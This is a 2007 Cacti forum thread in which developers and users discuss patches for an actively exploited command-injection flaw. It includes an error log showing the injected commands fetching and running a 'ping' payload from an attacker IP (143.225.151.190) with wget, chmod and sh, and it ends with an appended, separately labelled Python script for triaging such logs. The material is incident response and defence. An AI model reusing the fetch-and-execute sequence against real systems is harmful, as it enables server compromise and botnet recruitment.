rony Developer/Forum Admin
Joined: 17 Nov 2003 Posts: 5694 Location: Michigan, USA
Posted: Wed Jan 03, 2007 4:58 pm
Patch will be released this week.
rony Developer/Forum Admin
Joined: 17 Nov 2003 Posts: 5694 Location: Michigan, USA
Posted: Mon Jan 08, 2007 10:34 am
Patches for this issue are now available for the following versions:
0.8.6i
0.8.6h
roddie Cacti User
Joined: 10 Feb 2004 Posts: 106 Location: Frisco, TX
Posted: Tue Jan 09, 2007 3:15 pm
Can someone update the main page and maybe post something to Announcements about the available patches?
Makenshi
Joined: 08 Jun 2004 Posts: 26
Posted: Tue Jan 09, 2007 3:18 pm
My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however, I shall be reimaging the server tomorrow.
Makenshi
Joined: 08 Jun 2004 Posts: 26
Posted: Tue Jan 09, 2007 4:04 pm
Please see the log excerpt attached.
Attachment: cacti-httpd-access_log.txt (5.95 KB)
rony Developer/Forum Admin
Joined: 17 Nov 2003 Posts: 5694 Location: Michigan, USA
Posted: Tue Jan 09, 2007 4:11 pm
That's not the standard exploit.
Um... I will decode later to see what they were attempting to do. Thanks for the log.
BigWillyStyle42
Joined: 14 Mar 2006 Posts: 11
Posted: Tue Jan 09, 2007 11:59 pm
I think it's the same vulnerability, slightly different code, but they're still injecting a command into the SQL database.
The command calls wget to get a ping script, which it then calls, and wgets some other things. A similar command was used on my machine, except they downloaded two images which were tarballs containing scripts and an httpd that connected my machine to an underworld botnet...
Makenshi
Joined: 08 Jun 2004 Posts: 26
Posted: Wed Jan 10, 2007 4:04 am
These are a couple of files I managed to retrieve in /etc/cron.d/; the exploit managed to start sshd running on [::]:80 and [::]:443.
Attachment: hack-attempt-cacti.tgz (309.12 KB)
Ning
Joined: 31 Aug 2006 Posts: 1 Location: Denmark
Posted: Wed Jan 10, 2007 7:21 am
I've seen the same, but from another IP.
If I try to convert it, it turns out to something like this.
And the ping file it got from 143.225.151.190.
At this moment I'm very glad for SELinux.
Attachments:
ping.txt (731 Bytes): ping file from the remote server
convert.txt (1.09 KB)
httplog.txt (2.5 KB)
rony Developer/Forum Admin
Joined: 17 Nov 2003 Posts: 5694 Location: Michigan, USA
Posted: Wed Jan 10, 2007 9:34 am
Interesting...
Glad I have a local firewall configured.
TheWitness Developer
Joined: 14 May 2002 Posts: 13135 Location: MI, USA
Posted: Wed Jan 10, 2007 4:49 pm
Nasty, yet elegant exploit. It's rather scary.
TheWitness
dvl
Joined: 15 Nov 2006 Posts: 16 Location: Warrington, PA
Posted: Thu Jan 11, 2007 10:29 pm Post subject: Announce mailing list
PLEASE! Someone post this to the announce mailing list. It needs wider attention.
I've just submitted a patch for the FreeBSD port.
TheWitness Developer
Joined: 14 May 2002 Posts: 13135 Location: MI, USA
Posted: Thu Jan 11, 2007 11:41 pm
Done. Also, if you applied the patch and it broke your timespan selector: so long as you are not running the Timeshifter from Gandolf, you can apply the following file directly. I will correct the issue.
TheWitness
Attachment: inc_timespan_selector.zip (1.61 KB)
lozzd
Joined: 08 Dec 2005 Posts: 30
Posted: Sat Jan 13, 2007 11:29 am
I had the same as Ning.
However, I have the following in my error log:
Code:
--05:54:11-- http://143.225.151.190/libsh/ping.txt
=> `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11-- http://143.225.151.190/libsh/ping
=> `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied
Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now. There should really be a way to tell everyone about that! Had I not been checking through my error logs I wouldn't have known.
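A defender-side way to answer lozzd's question from the error log, as an added example that is not code from the Cacti project or from any poster in this thread: it parses a wget transcript like the one quoted above per URL and reports whether each download actually reached disk. The first two runs in the embedded sample are the quoted log lines; the third run, against the documentation-range address 203.0.113.5, is constructed to show what a successful write looks like.

```python
# Added example (not Cacti project code): group the wget output an injected
# "wget ...; sh ./ping" leaves in the error log by URL and record write outcome.
import re
from dataclasses import dataclass, field
FETCH_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")      # "--05:54:11-- http://..."
DENIED_RE = re.compile(r"Cannot write to `[^']+' \(Permission denied\)")
SAVED_RE = re.compile(r"`[^']+' saved \[\d+/\d+\]")        # wget's success line
FOLLOWUP_RE = re.compile(r"^(sh|chmod|mv):")               # shell errors after a fetch

@dataclass
class Fetch:
    url: str
    outcome: str = "unknown"                        # "saved", "denied" or "unknown"
    followups: list = field(default_factory=list)   # chmod/sh/mv errors that followed

def triage(log_text):
    # One Fetch per wget attempt, in log order; later lines attach to the last one.
    fetches = []
    for line in log_text.splitlines():
        line = line.strip()
        if m := FETCH_RE.match(line):
            fetches.append(Fetch(url=m.group(1)))
        elif fetches:
            cur = fetches[-1]
            if DENIED_RE.search(line):
                cur.outcome = "denied"
            elif SAVED_RE.search(line):
                cur.outcome = "saved"
            elif FOLLOWUP_RE.match(line):
                cur.followups.append(line)
    return fetches

def needs_forensics(fetches):
    # A denied write plus "No such file" errors means the payload never ran on disk.
    return [f.url for f in fetches if f.outcome == "saved"]
# Constructed sample: first two runs are the error-log lines quoted in the thread;
# the third is made up (documentation-range address) to show a successful write.
SAMPLE = """\
--05:54:11-- http://143.225.151.190/libsh/ping.txt
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
--05:54:11-- http://143.225.151.190/libsh/ping
Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
--06:10:02-- http://203.0.113.5/libsh/ping
06:10:03 (1.2 MB/s) - `ping' saved [15808/15808]
"""
```

Run `triage(SAMPLE)` and feed the result to `needs_forensics` to get only the fetches whose payload landed on disk; the two denied runs from the thread are reported but not escalated.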